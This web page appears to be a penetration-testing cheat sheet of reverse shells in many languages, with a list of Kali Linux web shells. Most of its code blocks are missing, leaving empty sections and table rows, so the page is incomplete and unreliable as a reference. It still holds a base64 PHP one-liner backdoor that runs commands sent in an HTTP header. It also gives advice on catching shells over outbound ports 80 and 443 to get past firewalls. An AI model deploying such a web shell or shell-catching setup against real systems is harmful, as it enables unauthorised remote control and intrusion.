- Setup Listening Netcat
- Bash Reverse Shells
- socat Reverse Shell
- Golang Reverse Shell
- PHP Reverse Shell
- Netcat Reverse Shell
- Node.js Reverse Shell
- Telnet Reverse Shell
- Perl Reverse Shell
- Ruby Reverse Shell
- Java Reverse Shell
- Python Reverse Shell
- Gawk Reverse Shell
- Kali Web Shells
During penetration testing if you’re lucky enough to find a remote command execution vulnerability, you’ll more often than not want to connect back to your attacking machine to leverage an interactive shell.
Below are a collection of Windows and Linux reverse shells that use commonly installed programming languages PHP, Python, Powershell, nc (Netcat), JSP, Java, Bash, PowerShell (PS). At the bottom of the post are a collection of uploadable reverse shells, present in Kali Linux.
If you found this resource usefull you should also check out our penetration testing tools cheat sheet which has some additional reverse shells and other commands useful when performing penetration testing.
25/02/2022 - House keeping 17/09/2020 - Updated to add the reverse shells submitted via Twitter @JaneScott 29/03/2015 - Original post date
Setup Listening Netcat
Your remote shell will need a listening netcat instance in order to connect back, a simple way to do this is using a cloud instance / VPS - Linode is a good choice as they give you a direct public IP so there is no NAT issues to worry about or debug, you can use this link to get a $100 Linode voucher.
Set your Netcat listening shell on an allowed port
Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443
To setup a listening netcat instance, enter the following:
NAT requires a port forward
If you're attacking machine is behing a NAT router, you'll need to setup a port forward to the attacking machines IP / Port.
ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).
Bash Reverse Shells
socat Reverse Shell
Source: @filip_dragovic
Golang Reverse Shell
PHP Reverse Shell
A useful PHP reverse shell:
Another PHP reverse shell (that was submitted via Twitter):
Base64 encoded by @0xInfection:
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);
Netcat Reverse Shell
Useful netcat reverse shell examples:
Don't forget to start your listener, or you won't be catching any shells :)
A reverse shell submitted by @0xatul which works well for OpenBSD netcat rather than GNU nc:
Node.js Reverse Shell
Source: @jobertabma via @JaneScott
Telnet Reverse Shell
Remember to listen on 443 on the attacking machine also.
Perl Reverse Shell
Perl Windows Reverse Shell
Ruby Reverse Shell
Java Reverse Shell
Python Reverse Shell
Gawk Reverse Shell
Gawk one liner rev shell by @dmfroberson:
Kali Web Shells
The following shells exist within Kali Linux, under /usr/share/webshells/
these are only useful if you are able to upload, inject or transfer the shell to the machine.
Kali PHP Web Shells
Kali PHP reverse shells and command shells:
Command | Description |
---|---|
|
Pen Test Monkey - PHP Reverse Shell |
|
Pen Test Monkey, Findsock Shell. Build |
|
PHP backdoor, usefull for CMD execution if upload / code injection is possible, usage: |
|
Larger PHP shell, with a text input box for command execution. |
Tip: Executing Reverse Shells
The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.
Kali Perl Reverse Shell
Kali perl reverse shell:
Command | Description |
---|---|
|
Pen Test Monkey - Perl Reverse Shell |
|
Pen Test Monkey, Perl Shell. Usage: |
Kali Cold Fusion Shell
Kali Coldfusion Shell:
Command | Description |
---|---|
|
Cold Fusion Shell - aka CFM Shell |
Kali ASP Shell
Classic ASP Reverse Shell + CMD shells:
Command | Description |
---|---|
|
Kali ASP Shells |
Kali ASPX Shells
ASP.NET reverse shells within Kali:
Command | Description |
---|---|
|
Kali ASPX Shells |
Kali JSP Reverse Shell
Kali JSP Reverse Shell:
Command | Description |
---|---|
|
Kali JSP Reverse Shell |